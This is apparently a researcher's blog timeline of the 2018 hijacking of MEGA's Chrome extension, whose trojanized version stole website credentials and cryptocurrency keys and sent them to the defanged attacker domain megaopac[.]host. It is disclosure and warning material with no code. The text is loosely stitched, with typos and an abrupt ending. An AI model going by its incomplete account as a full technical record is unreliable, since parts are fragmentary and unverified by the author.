Developer - Security engineer[email protected]
On 4 September at 14:30 UTC, an unknown attacker managed to hack into MEGA's Google Chrome web store account and upload a malicious version 3.39.4 of an extension to the web store, according to a blog post published by the company. Upon installation or auto-update, the malicious extension asked for elevated permissions to access personal information, allowing it to steal login/register credentials from ANY websites like Amazon, Github, and Google, along with online wallets such as MyEtherWallet and MyMonero, and Idex.market cryptocurrency trading platform. The trojanized Mega extension then sent all the stolen information back to an attacker's server located at megaopac[.]host in Ukraine, which is then used by the attackers to log in to the victims' accounts, and also extract the cryptocurrency private keys to steal users' digital currencies.
An unknown attacked managed to log into the Chrome Extension Store profile, used by MEGA Team. A new MEGA Chrome extension version (3.39.4) has been uploaded.16 UTC on 4th September 2018
A reddit user (/u/gattacus) noticed some unwanted changes to the latest version of Mega Chrome Extension. The Chrome browser originally asked for new
permissions about reading all the content from a web page. He was looking for its source code and he discovered a probably cryptocurrency-keys logging. Then he posted this thread
for having some confirmations from the community.
And I'll read it. I supposed "Whoa, another security issue" but I was looking for the source code too. IT happens! I discovered a keylogger which could log password, username and even sessions!
After the discovering of keylogging, I posted a warning on Twitter. The InfoSec Community and some security researches confirmed this issue.
17.23 UTC on 4th September 2018
!!! WARNING !!!!!!! PLEASE PAY ATTENTION!!— SerHack (@serhack_) September 4, 2018
LATEST VERSION OF MEGA CHROME EXTENSION WAS HACKED.
It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked@x0rz pic.twitter.com/TnPalqj1cz
The official Twitter account of Monero (XMR) posted a warning, advising XMR holders to steer clear of MEGA.
17.45 UTC on 4th September 2018
PSA: The official MEGA extension has been compromised and now includes functionality to steal your Monero: https://t.co/vzWwcM9E5k— Monero || #xmr (@monero) September 4, 2018
A security engineer, Jeremiah O'Connor, confirmed that infrastructure was related to AWS/MEW BGP attack.
Megaopac[.]host domain seems to have a login panel. Unfortunately, I did not any research about this.
What is this? ..